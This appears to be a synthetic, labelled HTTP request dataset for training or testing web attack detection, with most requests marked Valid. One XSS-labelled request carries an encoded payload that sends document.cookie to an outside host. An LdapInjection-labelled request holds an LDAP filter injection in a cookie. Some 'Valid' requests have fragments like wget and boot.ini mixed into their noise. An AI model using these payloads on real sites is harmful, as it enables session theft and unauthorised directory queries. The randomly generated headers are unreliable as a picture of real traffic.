Client-ip: 73.184.178.164
Cookie: toaelrdheolseY=8017;cotaee7aa=427349;rtw9hso=iMh5tnao83rqn;d7rheTiredY=eataarocor9es0;urii=f
Cookie2: $Version="626"
Date: Mon, 12 May 08 04:26:36 GMT
ETag: "9DQNF4FBxIgCkAq"
Expect: 100-continue
From: hnoyso@ioJaegaa.st
If-Modified-Since: Tue, 15 Jan 08 23:38:38 UTC
If-Unmodified-Since: Tue, 08 Dec 09 15:08:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Apr 06 01:20:09 GMT
Max-Forwards: 299
MIME-Version: 7.2
Pragma: ocom='sur'
Proxy-Authorization: Digest opaque="tidRaOc"
Authorization: Digest opaque="shtyeee"
Range: 6551-
Referer: http://www.hsagsi.be/ne5sti7/9no4.pdf
TE: trailers
Trailer: Connection
User-Agent: Mozilla/5.6 (Windows; U; Windows NT 8.3; ti-to; rv:3.5.6) Gecko/80221254
UA-CPU: Sparc
UA-Disp: 3759,7587,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 412x970
Via: 3.7 90.50.190.74
Transfer-Encoding: compress
Upgrade: nene/2.6
Warning: 397 74.229.205.213 "xet4unMadnhi1m7sg" "Sun, 08 Nov 09 23:21:56 UTC"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29481
Start - Id: 1268
class: Valid
GET /.ssock_streamAIPeX2xoadmin.js?iNin=tbr&qvbscript6c=283&yfqrhiycEfne70a=eCU5&0bV75M3jX=e%3AnS%3Ar&9feltl6t=ecttjom+&jnfNa4breole=lmU2G3c&nazts=l&tarb=505125427&dH=3118&Yh=zeer HTTP/1.1
Host: 123.234.144.218
Connection: keep-alive
Accept: image/gif;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.9
Accept-Language: 71ys7d-aejan;q=0.6, s-ud;q=0.6
Cache-Control: no-store
Client-ip: 32.114.105.164
Cookie: acpAeriemqRT=ulee8tmgy( s;yrr(i|;M0vbscriptallMKXC2AR=afjcGBx
Cookie2: $Version="1"
Date: Mon, 30 Mar 09 11:32:46 UTC
ETag: W/"Ot7PRVWdUwckzYyWvyx"
Expect: 100-continue
From: dSeu@yRMgnu.net
If-Modified-Since: Sat, 14 Jun 08 11:03:53 GMT
If-Unmodified-Since: Sun, 12 Mar 06 18:42:21 UTC
If-Match: "xMhAVlIE5W1D32_PtQco"
If-None-Match: *
If-Range: Sat, 26 Mar 05 08:29:34 UTC
Max-Forwards: 4057
MIME-Version: 2.1
Pragma: ni='e'
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: Digest opaque="newieca"
Range: 877225-,5968-55715
Referer: /1ndttli/gsqtor/o7nNrs/gwriw/sDlluut.mdb
TE: deflate,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/6.5 (X11; U; Linux i586 4.8; Tb-Of; rv:1.1.2) Gecko/68018102
UA-CPU: Sparc
UA-Disp: 7057,1864,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7486x696
Via: 1.3 232.57.108.65, FTP/2.7 221.215.112.108
Transfer-Encoding: compress
Upgrade: oisa/9.7, yntnte/0.1
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 51978605
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1268
Start - Id: 14612
class: Valid
GET /_-/myan/Co/oimNmG3s-RfIuzX1h/k1v6vtIi46/iaJeMv9GbDZdiG4/Yrf6rej/ySopen7L7EHKN/a@K.tiff?%uconnectTb_WRqxK=eui&pd=lojmGhsrre HTTP/1.0
Host: www.rtaeil.st:1523
Connection: close
Accept: */*;q=0.5
Accept-Charset: euc-kr;q=0.8, x-mac-cyrillic, iso-8859-8-i, x-mac-turkish;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: oyJReCso-y6so, eehci9ed-yedn;q=0.1
Cache-Control: no-cache
Client-ip: 238.75.53.47
Cookie: pcrsu=&;esaE=si8oa
Cookie2: $Version="4"
Date: Fri, 21 Oct 05 04:26:58 CET
ETag: W/"jmDxRyZXA3VL@cVA"
Expect: dfmtRr=njocOy
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Tue, 08 Jan 08 18:31:05 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:32:06 GMT
If-Match: *
If-None-Match: "YBZSY6xTxVef5Vr"
If-Range: Sat, 22 Jul 06 13:26:33 GMT
Max-Forwards: 7
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic QWVlOGFzRTpENm9lb3p0
Authorization: Digest username="8itL"
Range: 45-4785,-21867,70176-3030
Referer: /evheq/eRau/triePma/adin.gif
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/8.7 (X11; U; Unix 1.0; sq-ia; rv:2.6.3) Gecko/67556774
UA-CPU: 68000
UA-Disp: 1652,237,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 042x922
Via: 1.4 www.aloiudTg.htm
Transfer-Encoding: u7nr
Upgrade: eea/5.9, Un1n/0.4, cref/1.2, S6nc7e/0.8
Warning: 443 103.24.228.17 "ectotaen" "Thu, 12 Apr 07 16:19:50 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 28910349808
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14612
Start - Id: 24886
class: Valid
GET /eeouietea0/GSQu6Zy/i@RsOemJIo_g/nudDm0I.3tWURJYKfZ/estpohgyEnecocn1r/otGsaNre7iueA/fN5ctht1cn/8hdrt0o7.jpg?mrroeh8n=aufueuarlt&esod1nrnh=353646752&OFyhavinghtpass=eadiv&mywjyi=Anj&qo3Nhz_6J4=ywympizumbdlsaie&9bN5usrpasswdqN2n1f=rj6H8eL4SL8t&mAlTse1lDittlm=0ciplelttReecl&tcF=hOKlIZ5ap&srScnarehUtS1u=66046&5aEr2ehfe9nts=epBQ.n9 HTTP/1.1
Host: 144.137.70.192
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: bc3sazrd-egn, n-s;q=0.5
Cache-Control: max-age=78
Client-ip: 53.224.112.84
Cookie: rlotsrgOby7wzst=nuelejqm7;thoysoii=990672;eensrnm8O=leZm;nW2snmdutrt=9nm0xneHea
Cookie2: $Version="4"
Date: Mon, 16 Apr 07 23:40:53 CET
ETag: W/"ahnaoqFV9xRdesl"
Expect: 100-continue
From: jetanin0@wfha2rk3x8.biz
If-Modified-Since: Tue, 05 Jul 05 14:34:22 UTC
If-Unmodified-Since: Thu, 01 Jun 06 04:11:27 GMT
If-Match: *
If-None-Match: "0d_i-3atYhQio38_Vwn"
If-Range: *
Max-Forwards: 8636
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Vigo a1lc=hriaibi
Authorization: Basic T21vVDpuYWZucmQ=
Range: 2531-5,49-34
Referer: http://www.arri.fr/6afnv/C9n5laat/rtHh/e2pS.tiff
TE: chunked
Trailer: Range
User-Agent: lmx-XfT http://www.oiielks.org
UA-CPU: StrongARM
UA-Disp: 8792,070,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0163x5496
Via: 3.5 114.26.88.123, 7.4 128.234.159.126, 0.0 61.154.97.73
Transfer-Encoding: compress
Upgrade: ased8c/7.2, xfope/7.9, hidk/5.6, ote/8.0
Warning: 924 155.18.93.157 "jntnosetmawirwtuo5" 
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 5477334
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24886
Start - Id: 47161
class: XSS
GET /R3IoptUBAwr3oP/y0cf2/YhearoAbsee/g4GJpBVBQrjk/slBFNK9QOnZ-UK2c/eEot/rWQor1.Pg.mW0D.y.htm?5auowq=t6Vs&pche5ldC=%3Cimg++++src%3D%26%7B%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.nsni.com%2Fcgi-bin%2Fisstnile.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B++%3E&gf=14689&y3efn4dfrvr=nct&tmaiitdeAenmiaa=yt%3DF&8ene2ue8=r HTTP/1.0
Host: 135.255.113.21:80
Connection: close
Accept: text/xml;q=0.6, application/*, audio/*;q=0.7
Accept-Charset: iso-2022-jp, x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: fi='seej'
Client-ip: 123.54.69.161
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="825"
Date: Fri, 19 Feb 10 11:23:44 CET
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: nrnw
From: rRktr@tnrerr.uk
If-Modified-Since: Sun, 22 Mar 09 18:03:20 CET
If-Unmodified-Since: Tue, 15 Jan 08 02:45:59 GMT
If-Match: "jZt3MgrASkqywdtU"
If-None-Match: "eoLhxPyu.-MTfKxcRM"
If-Range: Mon, 17 Oct 05 16:17:25 UTC
Max-Forwards: 2063
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic aWllbmlnbTpjZW90
Range: -016,1-,67332-47295
Referer: http://www.o1km.uk/tninmtt/n7nnmrjr/e176e/tWcMet.nsf
TE: gzip;q=0.3,trailers
Trailer: Trailer
User-Agent: szun (mxe-LM; tzYy@kXgQE; beJvK-jPDw; ijHnk4efno)
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: gzip
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 36.159.65.174
X-Serial-Number: 02973768667711464
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47161
Start - Id: 7342
class: Valid
POST /mWXclOu.htm? HTTP/1.1
Content-Length: 111
Content-Language: reO1jn
Content-Encoding: gzip
Content-Location: /5Alrq/pTue/rai1T/9ltk9afh/TapIor.pdf
Content-MD5: ZWJuNnlJdnFnMGlkZWlBbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Apr 09 20:57:18 CET
Last-Modified: Sat, 11 Aug 07 09:12:27 UTC
Host: www.oeatdhe.uk
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1257;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.3
Cache-Control: max-age=128
Client-ip: 18.53.58.226
Cookie: ltpn=at=kr
Cookie2: $Version="452"
Date: Thu, 05 Jan 06 13:02:16 CET
ETag: W/"Q-Vu8CxN8jsJFGiq@"
Expect: 100-continue
From: paelsta@Bijzxj.uk
If-Modified-Since: Tue, 05 Feb 08 19:59:05 UTC
If-Unmodified-Since: Mon, 04 Oct 04 22:51:18 CET
If-Match: "4nEKueTDZ_.p5b8Ey.LQ"
If-None-Match: *
If-Range: Mon, 15 Dec 08 16:38:04 UTC
Max-Forwards: 9149
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: r5it7 xtlcz=Plhl65g5
Authorization: osed sv0i=yn4sm
Range: 0730-,-46
Referer: /IodNraat.swf
TE: trailers,gzip;q=0.3
Trailer: Expect
User-Agent: Mozilla/1.9 (Windows; U; WinNT 7.4; gd-ns; rv:8.7.1) Gecko/16856656
UA-CPU: x86
UA-Disp: 457,861,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1302x7380
Via: HTTP/2.5 www.wfteI2du.gif, 5.7 53.236.19.212, HTTP/7.8 www.iOzabc.shtml
Transfer-Encoding: nwere
Upgrade: 5a1o/5.9, umu/3.5
Warning: 655 100.141.12.117 "hcbd8ehsccIiFlye" 
X-Forwarded-For: 181.117.178.72
X-Serial-Number: 33978029627174385263
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

eeodao1=r3CvGo&louye=e0y=88rclen&KK0dexecv@@=ornb6lYkdQsX&gperilun1rR=F2Al aro%u&EHd_sam7=453&tcar1hoi=ei s

End - Id: 7342
Start - Id: 33735
class: Valid
POST /.iltbgsoundEgDztMLTe/4st7/tx.png? HTTP/1.1
Content-Length: 73
Content-Language: dissho
Content-Encoding: deflate
Content-Location: http://www.qosetda.de/rn8a/aiolao/iawtspo/etcth/8rsny.txt
Content-MD5: d2thZW54ZWFvY240ZThFcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Sep 04 09:30:38 UTC
Last-Modified: Sun, 05 Feb 06 22:53:23 GMT
Host: www.ohgee0t.biz
Connection: tfaR
Accept: */*;q=0.6
Accept-Charset: koi8-r, windows-874;q=0.8, iso-8859-4, x-mac-ce;q=0.0
Accept-Encoding: identity;q=0.8, identity, identity;q=0.8, identity;q=0.4, deflate
Accept-Language: csr-n6hftej
Cache-Control: max-age=65924
Client-ip: 47.121.242.116
Cookie: lnFt77ij-=urlI2LnkCh;Ulznlaet=3751334;lOXdnonTh=9963
Cookie2: $Version="88"
Date: Sat, 04 Jul 09 20:48:22 UTC
ETag: "VddookF8ntP7lzTG8"
Expect: 100-continue
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Tue, 20 Dec 05 06:54:36 CET
If-Unmodified-Since: Sat, 11 Jun 05 20:07:01 CET
If-Match: ".qdAMsjuvo_H-hD-hT"
If-None-Match: "WCVLaKI3oHCXNO.Qm"
If-Range: "o7mIhcC-FiPTrkYrl5xv"
Max-Forwards: 76
MIME-Version: 5.8
Pragma: yn=6lOct0ao
Proxy-Authorization: NTLM OVN2RW51NGhhYjd5U3BjUGU2cGFhZ2FEbGl5bzJlc251cjVp
Authorization: tLuuen 8sdcl=Gcde
Range: -52
Referer: /urlltt8.mp3
TE: trailers,trailers,deflate;q=0.9
Trailer: Referer
User-Agent: Mozilla/9.4 (X11; U; Open BSD i386 6.7; rv-eI; rv:0.8.9) Gecko/11542199
UA-CPU: StrongARM
UA-Disp: 812,1094,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 520x205
Via: 5.1 211.60.43.32, 3.4 www.psQ2s.js:7, HTTP/1.6 208.232.157.71
Transfer-Encoding: deflate
Upgrade: Xccd/0.2, esdaz/5.3
Warning: 146 www.heyaohc7.png "iqTeaiaieCen" "Thu, 28 May 09 11:14:53 UTC"
X-Forwarded-For: 109.249.70.237
X-Serial-Number: 695598853636
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

esnctk=tuN8c &U5bdc3Ei=9sV&eEoh=5084724&ohnc=b5UQOY0o2&1-cHhtacceszC=Hpan

End - Id: 33735
Start - Id: 36887
class: LdapInjection
GET /ilogtelnet@I/7eani4bt7hwtnmpt/r240Mf3roHfht0yz/hJnS6fv8/elaMmt8A/tcI.asp? HTTP/1.0
Host: 112.233.33.76:80
Connection: close
Accept: image/*, video/*;q=0.6
Accept-Charset: iso-8859-2;q=0.8, iso-8859-9, iso-8859-8;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 190.47.115.152
Cookie: nenOmtrtc=fpiuK;nHEuomw2=)    (    |(displayName=had*)    (name=had* )(   mail=had*);tytafseNe=41443970
Cookie2: $Version="571"
Date: Mon, 16 Feb 04 20:27:24 UTC
ETag: "2fYKv5.NAag17_oRu_"
Expect: 100-continue
From: otdtT5@ood5yg.fr
If-Modified-Since: Tue, 26 Jun 07 14:59:00 UTC
If-Unmodified-Since: Tue, 04 Jul 06 07:37:26 CET
If-Match: "hyPKVsh6xUkQcitBQLJk"
If-None-Match: *
If-Range: Tue, 04 Aug 09 04:34:07 UTC
Max-Forwards: 8
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic QWVJcmFoOjhsZDd0OQ==
Authorization: ohyd 1cjloct=ceaae5gy
Range: 138-
Referer: http://www.yeass.st/eh2Asdaj/tM2ays/enNtoo/te7eth.png
TE: trailers
User-Agent: Mozilla/2.0 (compatible; MSIE 7.8; Windows NT; erentqim7; 9zjzys)
UA-CPU: MIPS
UA-Disp: 5898,6177,16
UA-OS: Windows NT
UA-Pixels: 755x6863
Via: 4.2 58.101.141.186:369
Transfer-Encoding: compress
Warning: 131 www.eea2mn.jpeg "ygsearuoIlRigensha" "Sat, 23 Dec 06 15:37:17 UTC"
X-Serial-Number: 441224471064732
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36887
Start - Id: 10717
class: Valid
GET /t1Mi0TnD/o7eowrnmltb/rGP_Xp/hlutntoidwc/m93QiS9@aICcQGoSdelp/keez3o/uu/ybtbo0drrlonrdtuscAt/eYfplPZen/cE_wBevalqwf/ianpanmryery31char.js?dsAtf=lfRMAwoC4G&ZrzQ2=gast7cp6s&l7=frte6ael4orobeIb&eee5llts=078&LVtqhavingWNn=imu&hesUDoheen=nqaohorh7ruka&yDeeDiee3=%5Bboot.inin&oggbZE=28732700 HTTP/1.0
Host: www.ui6lrgo.fr
Connection: enysi
Accept: application/*;q=0.9, video/*;q=0.3, application/zip;q=0.0
Accept-Charset: x-mac-cyrillic, hz-gb-2312;q=0.4, shift_jis, x-mac-chinesesimp
Accept-Encoding: compress, deflate;q=0.5, compress;q=0.4, gzip
Accept-Language: ad-iutghea;q=0.7, daarcl1-jnle
Cache-Control: only-if-cached
Client-ip: 150.14.84.164
Cookie: ieyybE8q=s9sIhftdaxH;ocr=151134655;inzeeiw=fatey5'psanese
Cookie2: $Version="2"
Date: Wed, 08 Sep 04 10:43:57 UTC
ETag: "WUg9JirefD8v_q3MzuXi"
Expect: eocns=iylibw
From: apymaii@Pdts.net
If-Modified-Since: Mon, 04 Jul 05 17:35:41 CET
If-Unmodified-Since: Wed, 14 Apr 10 13:53:27 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 38
MIME-Version: 7.4
Pragma: nav=tp6
Proxy-Authorization: Digest nonce
Authorization: Basic ZHR0c2g6d2FyZGxlZQ==
Range: 02-95
Referer: /NRreehn/noSr/emo9e.php
TE: deflate;q=0.8
Trailer: If-Range
User-Agent: Mozilla/1.0 (Windows; U; Win 9x 1.9; hn-mo; rv:1.1.3) Gecko/16762522
UA-CPU: x86
UA-Disp: 592,9913,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 060x417
Via: temiR/6.3 149.238.248.135:5
Transfer-Encoding: identity
Upgrade: cdhjae/8.4, v3aE/6.8, Oghltt/7.0, nxnynb/4.3, Iho/7.4
Warning: 426 117.201.51.141 "WtatHstet1tscTat" 
X-Forwarded-For: 119.229.255.152
X-Serial-Number: 86511252930655335288
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10717
Start - Id: 15679
class: Valid
GET /7H/position6ua/fLen1omyhc/eyjpqqZMKdEiPe325lT.png?6wct1v=4&xv=yyxTua0qaseotc&uru5ipflgr2eoh=452&srgeria6r8r=sio7bz5wni&Iraedenkir=np&tbysvamerT2=dbinweieestaiom&xolneah=cn&aeoaE0=Ltesesf HTTP/1.1
Host: www.o6eeabeIi.fr
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-7, iso-10646-ucs-2;q=0.0, gb2312;q=0.0, euc-kr;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=279
Client-ip: 126.84.214.50
Cookie: tozttsgcy=ne1i2F9i|i;earssE2beo4=ayetcmh;idonrtTehflep=edexec
Cookie2: $Version="87"
Date: Sun, 26 Dec 04 07:24:13 UTC
ETag: "MYki.uof4Jf1o_crx"
Expect: 100-continue
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Sat, 20 Mar 04 24:10:40 CET
If-Unmodified-Since: Wed, 18 Aug 04 15:48:00 CET
If-Match: *
If-None-Match: "DGMgI_Pk2l8UAOUyCRoc"
If-Range: Thu, 15 Jan 04 12:26:39 GMT
Max-Forwards: 0
MIME-Version: 6.6
Pragma: fed='3lou'
Proxy-Authorization: dtsewm peesp=dtehnigo
Authorization: HnDe Itrtna=rhja
Range: 3-,7482-,845238-
Referer: /T5uGi/nteest0/dsrm0H.asp
TE: gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.4 (X11; U; Solaris 1.0; ti-bh; rv:8.2.2) Gecko/21247470
UA-CPU: StrongARM
UA-Disp: 9331,266,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2296x8201
Via: 7.6 www.rzia.gif, HTTP/2.3 www.oLilAyEi.jpg
Transfer-Encoding: deflate
Upgrade: nIttOn/7.6, s3nl/3.5, 90l/3.3, yneaI/5.5
Warning: 358 www.IqahRx.css "teexfzsw" 
X-Forwarded-For: 255.121.54.148
X-Serial-Number: 4254681
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15679
Start - Id: 13078
class: Valid
GET /bPQmJeLdJk/nppdz4TQmNkmW/nBOo59J6BzN61D/1tt8mer/el0rZjrXXirq15DRCm/lE04Do/roqBI-pdeY1cqTN.html? HTTP/1.0
Host: 210.217.245.196
Connection: ol3nd
Accept: audio/x-wav;q=0.9, audio/basic, text/xml
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 25.242.176.218
Cookie: SfcYOsrjXB.F=rtelnetf7document/8tore;E7fmmrcp=i$8pwglsyDi;O5sE=iwO627;0KAUYHlo=:mtmn/v<htxp2;tat=Nw3eepoe7w fifnt;noitfRmpoeuAg=91487
Cookie2: $Version="333"
Date: Sat, 18 Jun 05 17:13:47 CET
ETag: W/"v2V@RYlnc_EIBTXD3noE"
Expect: obttpe=aNfr
From: tnhi4hE@9okqw9h.it
If-Modified-Since: Sun, 11 Sep 05 09:16:47 CET
If-Unmodified-Since: Sat, 26 Jun 04 05:36:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4756
MIME-Version: 1.2
Pragma: l='reA'
Proxy-Authorization: szdzqT tCdnv=acteb9
Authorization: Zbct eopt=riwa
Range: 65780-,3-830,6-864
Referer: http://tggsrmtn.de/HtehlcM.dll
TE: trailers,trailers,deflate;q=0.8
Trailer: Accept-Encoding
User-Agent: ssj8u (fM7yc4fR; oD7M01YG)
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 880x583
Via: FTP/9.7 www.nseire.tiff, FTP/2.2 www.oPh4.jpeg
Transfer-Encoding: gzip
Upgrade: s5iqnh/8.3, kyo/5.0
Warning: 640 www.1louxUcH.gif:02024 "htiLue4k" "Tue, 30 Oct 07 05:54:05 GMT"
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 837041373393858
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13078
Start - Id: 25021
class: Valid
GET /0j8B/jB7C-Gmg/nlres3olntesSqp.js?isxml4chassqA=%5CpiRrwimewinntj+me&rbneradhticn=aiy0eee7mhtatm9E0t&Xe88FKNinsert-=5&JypTRc15update=2685&tSx.=935380&els6Asb=arW&tcewoi=Q&4erptuypllt=ty&eae61tyolae3ei=%3Bnt%5BaaogftpE7o%3Beosti&x8ircnnisqe=sfTcC-gee%3D&emfZXJdS@5G=%40passthrud&HRe4rjuonaurig=hA%3F1wget HTTP/1.0
Host: 224.80.120.226
Connection: AQif5ra
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 43.68.29.195
Cookie: 0a9PhtpassLBgP5c=f]boot.ininetcatmp+usnd%nu] fnb;ae5cn8cl=su%umailrbs7
Cookie2: $Version="2"
Date: Thu, 31 Aug 06 22:39:39 GMT
ETag: W/"PoDJtY-OS1AIM2@"
Expect: eiSll=bseZesoe
From: nzwrNfc3@izathr7huy.uk
If-Modified-Since: Fri, 19 Nov 04 11:03:39 UTC
If-Unmodified-Since: Fri, 01 Jun 07 06:06:14 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1395
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="lezief"
Authorization: Digest nc=C40B2b79
Range: 46-,280-2255,32588-
Referer: /wsbira/ndTfhl.exe
TE: trailers
Trailer: Connection
User-Agent: osblsaiaEegydi
UA-CPU: MIPS
UA-Disp: 0119,2506,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 669x906
Via: 3.5 www.noto6.html, FTP/0.1 186.249.105.53, fri/1.7 www.aimRoOea.jpeg
Transfer-Encoding: gzip
Upgrade: obsc4n/7.8, swq/1.1, ireR/7.9, aum/7.7
Warning: 922 25.148.114.39:28474 "fmaasanertcaeR" 
X-Forwarded-For: 190.232.63.32
X-Serial-Number: 5515309896252
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25021
Start - Id: 3308
class: Valid
GET /3iulror/H6j8_CD5cat/lqp65@tc/ZygteQTYIoZE4/vGHKhqjke/bH/aesetrlwNpu/dhjtemrn/VtdefM8yfmochacjRQ/httaeispp3shPaedig/9L0tRAG8DL60COw/mB_cac.gif?f8a=+dunionpS&aomn=e%3E+muossitqs&e1drhnunmi=34889&4LsamF=mCEj.sJjd&ehti=529541259&savtdtralaiplr=ucopys1sc9na&T5boiij630=6&nnmesoerddbsahl=iid&et=TfOisZ&prsrretpalo=3&mis7tetxEttt=obl6+%7Eg9sdoltgn&uecoh=oeofgnp%3Ahl&Wgwp-NX=cqiframefl4mocha00bx%2Frn%3FE&Ao2eftvse=939738 HTTP/1.1
Host: 79.99.137.223:41
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-icelandic;q=0.8, hz-gb-2312, cp-950, x-mac-japanese;q=0.1
Accept-Encoding: *
Accept-Language: sah5nae-okn6, ls7h-tu;q=0.2, nleuodsn-ae9h;q=0.6, dtD0n-hioiGya;q=0.6, ue-gwrno1H;q=0.1
Cache-Control: max-stale=01
Client-ip: 134.201.181.61
Cookie: c0ittsRtia=136381;taIwtfesaeoaah= r;ajenShtrlrev=992534642;riheeirAo1lnte='e7ro;lumt=288913
Cookie2: $Version="250"
Date: Sun, 28 May 06 19:06:06 GMT
ETag: W/"B6CYsOrycHzh8pC52VW"
Expect: obew1
From: gooi@er7rmrhs.st
If-Modified-Since: Mon, 12 Sep 05 16:36:19 CET
If-Unmodified-Since: Mon, 22 Aug 05 02:01:58 CET
If-Match: "x7RN1k6srKatsaTX29X2"
If-None-Match: *
If-Range: "TCKtE8zFtJ5mq0G"
Max-Forwards: 7
MIME-Version: 4.9
Pragma: xenh='cee'
Proxy-Authorization: NTLM Y3R0ZGRTcmxiZW1iYWRhb0p0dHpuSHRvMDh2YXRmUXRVbw==
Authorization: Basic aG10YTplZ281Z2NhZQ==
Range: 715429-,64862-,731-870612
Referer: /iHhs/tsdsts.php4
TE: trailers,deflate
Trailer: Upgrade
User-Agent: jvsetl (gESuXdQ5yO; tMtu9L; bIbT3I; uEaMSivM)
UA-CPU: PowerPC
UA-Disp: 517,125,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 179x3842
Via: 4.3 www.ushrerth.tiff, 8.5 16.155.124.196
Transfer-Encoding: gzip
Upgrade: ttlGsr/8.8, mshe/7.2
Warning: 659 214.21.203.106 "Esha" 
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 671477546416397721
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 3308
Start - Id: 501
class: Valid
GET /CorCPwhere@fiFkR.js? HTTP/1.0
Host: www.axhNhm.com:80
Connection: close
Accept: application/x-tar;q=0.4, text/*;q=0.9
Accept-Charset: windows-1252, cp-950;q=0.5, cp-936;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: wa='myd'
Client-ip: 1.69.55.188
Cookie: bwe=selecteIs(ihbst0wiAn;ws0=812140;pprocessing-instructionor7copynfqqmB=bA_e3;mgdxodfnnf=mu4mV_
Cookie2: $Version="1"
Date: Fri, 26 Jun 09 07:15:13 GMT
ETag: "QA-xx7Hw1XLPBBd.R.L"
Expect: mcroe6oy
From: galnhlb@rtpbreUei.com
If-Modified-Since: Tue, 07 Jul 09 08:00:06 UTC
If-Unmodified-Since: Sat, 20 May 06 19:25:23 CET
If-Match: *
If-None-Match: "M5N62oQ4fSSgvEFdJw"
If-Range: "g6uk_0ZOSnlfsAIRXonR"
Max-Forwards: 520
MIME-Version: 9.6
Pragma: c='xtutnht'
Proxy-Authorization: Basic ZW4yaWVhOm90ZFNv
Authorization: NTLM bXNiZWllcGM3dG1uOHQ3aXJma3ByNnNFYW9FdHIzZWU=
Range: -1,-90,0-
Referer: /ewdo/1ahnezn/hnH8Eov.conf
TE: chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: nRlgm/3.6.1
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2278x9542
Via: HTTP/1.8 www.is3b8s.shtml
Transfer-Encoding: 1n0ru; nhiit=ppol
Upgrade: mrao/9.0, uanni/6.9, 3tu/9.8, iaRRs/1.4
Warning: 386 233.83.75.168 "ufears" 
X-Forwarded-For: 138.137.120.213
X-Serial-Number: 9170010950
----: -----------------------------------------
